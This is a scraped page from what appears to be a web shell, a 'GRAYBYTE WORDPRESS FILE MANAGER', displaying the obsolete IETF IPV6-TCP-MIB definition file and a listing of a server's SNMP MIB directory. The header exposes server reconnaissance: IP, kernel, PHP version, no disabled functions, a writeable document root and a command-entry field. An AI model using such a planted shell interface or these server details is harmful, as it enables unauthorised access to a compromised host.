GRAYBYTE WORDPRESS FILE MANAGER5634

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /usr/share/snmp/mibs/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /usr/share/snmp/mibs//IPV6-TCP-MIB.txt
IPV6-TCP-MIB DEFINITIONS ::= BEGIN

IMPORTS
   MODULE-COMPLIANCE, OBJECT-GROUP      FROM SNMPv2-CONF
   MODULE-IDENTITY, OBJECT-TYPE,
   mib-2, experimental                  FROM SNMPv2-SMI
   Ipv6Address, Ipv6IfIndexOrZero       FROM IPV6-TC;

ipv6TcpMIB MODULE-IDENTITY
   LAST-UPDATED "201702220000Z"
   ORGANIZATION "IETF IPv6 MIB Working Group"
   CONTACT-INFO
        "       Mike Daniele

                Postal: Compaq Computer Corporation
                        110 Spitbrook Rd
                        Nashua, NH 03062.
                        US

                Phone:  +1 603 884 1423
                Email:  daniele@zk3.dec.com"
   DESCRIPTION
        "The obsolete MIB module for entities implementing TCP
        over IPv6.  Use the TCP-MIB instead.

        Copyright (c) 2017 IETF Trust and the persons identified
        as authors of the code.  All rights reserved.

        Redistribution and use in source and binary forms, with
        or without modification, is permitted pursuant to, and
        subject to the license terms contained in, the Simplified
        BSD License set forth in Section 4.c of the IETF Trust's
        Legal Provisions Relating to IETF Documents
        (http://trustee.ietf.org/license-info)."
   REVISION "201702220000Z"
   DESCRIPTION
        "Obsoleting this MIB module; it has been replaced by
        the revised TCP-MIB (RFC 4022)."
   REVISION "9801290000Z"
   DESCRIPTION
        "First revision, published as RFC 2452"
   ::= { experimental 86 }

-- objects specific to TCP for IPv6

tcp      OBJECT IDENTIFIER ::= { mib-2 6 }

-- the TCP over IPv6 Connection table

-- This connection table contains information about this
-- entity's existing TCP connections between IPv6 endpoints.
-- Only connections between IPv6 addresses are contained in
-- this table.  This entity's connections between IPv4
-- endpoints are contained in tcpConnTable.

ipv6TcpConnTable OBJECT-TYPE
   SYNTAX      SEQUENCE OF Ipv6TcpConnEntry
   MAX-ACCESS  not-accessible
   STATUS      obsolete
   DESCRIPTION
        "A table containing TCP connection-specific information,
         for only those connections whose endpoints are IPv6 addresses.

         This table is obsoleted by TCP-MIB::tcpConnectionTable."
   ::= { tcp 16 }

ipv6TcpConnEntry OBJECT-TYPE
   SYNTAX      Ipv6TcpConnEntry
   MAX-ACCESS  not-accessible
   STATUS      obsolete
   DESCRIPTION
        "A conceptual row of the ipv6TcpConnTable containing
         information about a particular current TCP connection.
         Each row of this table is transient, in that it ceases to
         exist when (or soon after) the connection makes the transition
         to the CLOSED state.

         Note that conceptual rows in this table require an additional
         index object compared to tcpConnTable, since IPv6 addresses
         are not guaranteed to be unique on the managed node.

         This entry is obsoleted by TCP-MIB::tcpConnectionEntry."
   INDEX   { ipv6TcpConnLocalAddress,
             ipv6TcpConnLocalPort,
             ipv6TcpConnRemAddress,
             ipv6TcpConnRemPort,
             ipv6TcpConnIfIndex }
   ::= { ipv6TcpConnTable 1 }

Ipv6TcpConnEntry ::=
   SEQUENCE { ipv6TcpConnLocalAddress    Ipv6Address,
              ipv6TcpConnLocalPort       INTEGER,
              ipv6TcpConnRemAddress      Ipv6Address,
              ipv6TcpConnRemPort         INTEGER,
              ipv6TcpConnIfIndex         Ipv6IfIndexOrZero,
              ipv6TcpConnState           INTEGER }

ipv6TcpConnLocalAddress OBJECT-TYPE
   SYNTAX     Ipv6Address
   MAX-ACCESS not-accessible
   STATUS     obsolete
   DESCRIPTION
        "The local IPv6 address for this TCP connection.  In
         the case of a connection in the listen state which
         is willing to accept connections for any IPv6
         address associated with the managed node, the value
         ::0 is used.

         This object is obsoleted by
         TCP-MIB::tcpConnectionLocalAddressType."
   ::= { ipv6TcpConnEntry 1 }

ipv6TcpConnLocalPort OBJECT-TYPE
   SYNTAX     INTEGER (0..65535)
   MAX-ACCESS not-accessible
   STATUS     obsolete
   DESCRIPTION
        "The local port number for this TCP connection.

        This object is obsoleted by TCP-MIB::tcpConnectionLocalPort."
   ::= { ipv6TcpConnEntry 2 }

ipv6TcpConnRemAddress OBJECT-TYPE
   SYNTAX     Ipv6Address
   MAX-ACCESS not-accessible
   STATUS     obsolete
   DESCRIPTION
        "The remote IPv6 address for this TCP connection.

        This object is obsoleted by TCP-MIB::tcpConnectionRemAddress."
   ::= { ipv6TcpConnEntry 3 }

ipv6TcpConnRemPort OBJECT-TYPE
   SYNTAX     INTEGER (0..65535)
   MAX-ACCESS not-accessible
   STATUS     obsolete
   DESCRIPTION
        "The remote port number for this TCP connection.

        This object is obsoleted by TCP-MIB::tcpConnectionRemPort."
   ::= { ipv6TcpConnEntry 4 }

ipv6TcpConnIfIndex OBJECT-TYPE
   SYNTAX     Ipv6IfIndexOrZero
   MAX-ACCESS not-accessible
   STATUS     obsolete
   DESCRIPTION
        "An index object used to disambiguate conceptual rows in
         the table, since the connection 4-tuple may not be unique.

         If the connection's remote address (ipv6TcpConnRemAddress)
         is a link-local address and the connection's local address
         (ipv6TcpConnLocalAddress) is not a link-local address, this
         object identifies a local interface on the same link as
         the connection's remote link-local address.

         Otherwise, this object identifies the local interface that
         is associated with the ipv6TcpConnLocalAddress for this
         TCP connection.  If such a local interface cannot be
         determined, this object should take on the value 0.
         (A possible example of this would be if the value of
         ipv6TcpConnLocalAddress is ::0.)

         The interface identified by a particular non-0 value of this
         index is the same interface as identified by the same value
         of ipv6IfIndex.

         The value of this object must remain constant during the life
         of the TCP connection.

         This object is obsoleted by the zone identifier in
         an InetAddressIPv6z address in either
         TCP-MIB::tcpConnectionLocalAddress or
         TCP-MIB::tcpConnectionRemAddress."
   ::= { ipv6TcpConnEntry 5 }

ipv6TcpConnState OBJECT-TYPE
   SYNTAX     INTEGER {
        closed(1),
        listen(2),
        synSent(3),
        synReceived(4),
        established(5),
        finWait1(6),
        finWait2(7),
        closeWait(8),
        lastAck(9),
        closing(10),
        timeWait(11),
        deleteTCB(12) }
   MAX-ACCESS read-write
   STATUS     obsolete
   DESCRIPTION
        "The state of this TCP connection.

         The only value which may be set by a management station is
         deleteTCB(12).  Accordingly, it is appropriate for an agent
         to return an error response ('badValue' for SNMPv1,
         'wrongValue' for SNMPv2) if a management station attempts
         to set this object to any other value.

         If a management station sets this object to the value
         deleteTCB(12), then this has the effect of deleting the TCB
         (as defined in RFC 793) of the corresponding connection on
         the managed node, resulting in immediate termination of the
         connection.

         As an implementation-specific option, a RST segment may be
         sent from the managed node to the other TCP endpoint (note
         however that RST segments are not sent reliably).

         This object is obsoleted by TCP-MIB::tcpConnectionState."
   ::= { ipv6TcpConnEntry 6 }

--
-- conformance information
--

ipv6TcpConformance OBJECT IDENTIFIER ::= { ipv6TcpMIB 2 }

ipv6TcpCompliances OBJECT IDENTIFIER ::= { ipv6TcpConformance 1 }
ipv6TcpGroups      OBJECT IDENTIFIER ::= { ipv6TcpConformance 2 }

-- compliance statements

ipv6TcpCompliance MODULE-COMPLIANCE
   STATUS  obsolete
   DESCRIPTION
        "The compliance statement for SNMPv2 entities which
         implement TCP over IPv6.

         This compliance statement is obsoleted by
         TCP-MIB::tcpMIBCompliance2."
   MODULE  -- this module
   MANDATORY-GROUPS { ipv6TcpGroup }
   ::= { ipv6TcpCompliances 1 }

ipv6TcpGroup OBJECT-GROUP
   OBJECTS   { -- these are defined in this module

               -- ipv6TcpConnLocalAddress (not-accessible)
               -- ipv6TcpConnLocalPort (not-accessible)
               -- ipv6TcpConnRemAddress (not-accessible)
               -- ipv6TcpConnRemPort (not-accessible)
               -- ipv6TcpConnIfIndex (not-accessible)
               ipv6TcpConnState }
   STATUS    obsolete
   DESCRIPTION
        "The group of objects providing management of
         TCP over IPv6.

         This group is obsoleted by several groups in TCP-MIB."
   ::= { ipv6TcpGroups 1 }

END

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 23 2024 09:15:35
root / root
0755
AGENTX-MIB.txt
17.046 KB
May 23 2024 09:15:33
root / root
0644
BRIDGE-MIB.txt
49.754 KB
May 23 2024 09:15:33
root / root
0644
DISMAN-EVENT-MIB.txt
66.508 KB
May 23 2024 09:15:34
root / root
0644
DISMAN-SCHEDULE-MIB.txt
24.036 KB
May 23 2024 09:15:34
root / root
0644
DISMAN-SCRIPT-MIB.txt
62.804 KB
May 23 2024 09:15:33
root / root
0644
EtherLike-MIB.txt
82.512 KB
May 23 2024 09:15:34
root / root
0644
HCNUM-TC.txt
4.551 KB
May 23 2024 09:15:33
root / root
0644
HOST-RESOURCES-MIB.txt
51.313 KB
May 23 2024 09:15:34
root / root
0644
HOST-RESOURCES-TYPES.txt
10.335 KB
May 23 2024 09:15:34
root / root
0644
IANA-ADDRESS-FAMILY-NUMBERS-MIB.txt
6.556 KB
May 23 2024 09:15:33
root / root
0644
IANA-LANGUAGE-MIB.txt
4.284 KB
May 23 2024 09:15:33
root / root
0644
IANA-RTPROTO-MIB.txt
4.002 KB
May 23 2024 09:15:33
root / root
0644
IANAifType-MIB.txt
34.555 KB
May 23 2024 09:15:33
root / root
0644
IF-INVERTED-STACK-MIB.txt
4.947 KB
May 23 2024 09:15:33
root / root
0644
IF-MIB.txt
70.011 KB
May 23 2024 09:15:34
root / root
0644
INET-ADDRESS-MIB.txt
16.389 KB
May 23 2024 09:15:33
root / root
0644
IP-FORWARD-MIB.txt
45.201 KB
May 23 2024 09:15:34
root / root
0644
IP-MIB.txt
181.315 KB
May 23 2024 09:15:34
root / root
0644
IPV6-FLOW-LABEL-MIB.txt
1.98 KB
May 23 2024 09:15:33
root / root
0644
IPV6-ICMP-MIB.txt
20.563 KB
May 23 2024 09:15:33
root / root
0644
IPV6-MIB.txt
55.14 KB
May 23 2024 09:15:33
root / root
0644
IPV6-TC.txt
3.08 KB
May 23 2024 09:15:33
root / root
0644
IPV6-TCP-MIB.txt
8.65 KB
May 23 2024 09:15:33
root / root
0644
IPV6-UDP-MIB.txt
5.564 KB
May 23 2024 09:15:33
root / root
0644
LM-SENSORS-MIB.txt
5.792 KB
May 23 2024 09:15:34
root / root
0644
MTA-MIB.txt
41.382 KB
May 23 2024 09:15:34
root / root
0644
NET-SNMP-AGENT-MIB.txt
15.528 KB
May 23 2024 09:15:34
root / root
0644
NET-SNMP-EXAMPLES-MIB.txt
8.945 KB
May 23 2024 09:15:33
root / root
0644
NET-SNMP-EXTEND-MIB.txt
9.107 KB
May 23 2024 09:15:34
root / root
0644
NET-SNMP-MIB.txt
1.988 KB
May 23 2024 09:15:33
root / root
0644
NET-SNMP-PASS-MIB.txt
3.643 KB
May 23 2024 09:15:34
root / root
0644
NET-SNMP-TC.txt
4.701 KB
May 23 2024 09:15:33
root / root
0644
NET-SNMP-VACM-MIB.txt
4.921 KB
May 23 2024 09:15:34
root / root
0644
NETWORK-SERVICES-MIB.txt
20.514 KB
May 23 2024 09:15:34
root / root
0644
NOTIFICATION-LOG-MIB.txt
24.115 KB
May 23 2024 09:15:34
root / root
0644
RFC-1215.txt
1.146 KB
May 23 2024 09:15:33
root / root
0644
RFC1155-SMI.txt
2.995 KB
May 23 2024 09:15:33
root / root
0644
RFC1213-MIB.txt
77.8 KB
May 23 2024 09:15:33
root / root
0644
RMON-MIB.txt
144.357 KB
May 23 2024 09:15:34
root / root
0644
SCTP-MIB.txt
44.261 KB
May 23 2024 09:15:34
root / root
0644
SMUX-MIB.txt
4.54 KB
May 23 2024 09:15:33
root / root
0644
SNMP-COMMUNITY-MIB.txt
15.127 KB
May 23 2024 09:15:34
root / root
0644
SNMP-FRAMEWORK-MIB.txt
21.818 KB
May 23 2024 09:15:34
root / root
0644
SNMP-MPD-MIB.txt
5.367 KB
May 23 2024 09:15:34
root / root
0644
SNMP-NOTIFICATION-MIB.txt
19.545 KB
May 23 2024 09:15:34
root / root
0644
SNMP-PROXY-MIB.txt
8.893 KB
May 23 2024 09:15:33
root / root
0644
SNMP-TARGET-MIB.txt
22.235 KB
May 23 2024 09:15:34
root / root
0644
SNMP-TLS-TM-MIB.txt
42.897 KB
May 23 2024 09:15:33
root / root
0644
SNMP-TSM-MIB.txt
8.703 KB
May 23 2024 09:15:33
root / root
0644
SNMP-USER-BASED-SM-MIB.txt
38.282 KB
May 23 2024 09:15:34
root / root
0644
SNMP-USM-AES-MIB.txt
2.153 KB
May 23 2024 09:15:33
root / root
0644
SNMP-USM-DH-OBJECTS-MIB.txt
20.606 KB
May 23 2024 09:15:33
root / root
0644
SNMP-USM-HMAC-SHA2-MIB.txt
4.297 KB
May 23 2024 09:15:33
root / root
0644
SNMP-VIEW-BASED-ACM-MIB.txt
33.361 KB
May 23 2024 09:15:34
root / root
0644
SNMPv2-CONF.txt
8.069 KB
May 23 2024 09:15:33
root / root
0644
SNMPv2-MIB.txt
28.618 KB
May 23 2024 09:15:34
root / root
0644
SNMPv2-SMI.txt
8.715 KB
May 23 2024 09:15:33
root / root
0644
SNMPv2-TC.txt
37.143 KB
May 23 2024 09:15:33
root / root
0644
SNMPv2-TM.txt
5.64 KB
May 23 2024 09:15:34
root / root
0644
TCP-MIB.txt
27.895 KB
May 23 2024 09:15:34
root / root
0644
TRANSPORT-ADDRESS-MIB.txt
16.033 KB
May 23 2024 09:15:33
root / root
0644
TUNNEL-MIB.txt
27.174 KB
May 23 2024 09:15:33
root / root
0644
UCD-DEMO-MIB.txt
2.112 KB
May 23 2024 09:15:34
root / root
0644
UCD-DISKIO-MIB.txt
4.849 KB
May 23 2024 09:15:34
root / root
0644
UCD-DLMOD-MIB.txt
3.015 KB
May 23 2024 09:15:34
root / root
0644
UCD-IPFWACC-MIB.txt
7.928 KB
May 23 2024 09:15:34
root / root
0644
UCD-SNMP-MIB.txt
52.088 KB
May 23 2024 09:15:34
root / root
0644
UDP-MIB.txt
20.393 KB
May 23 2024 09:15:34
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF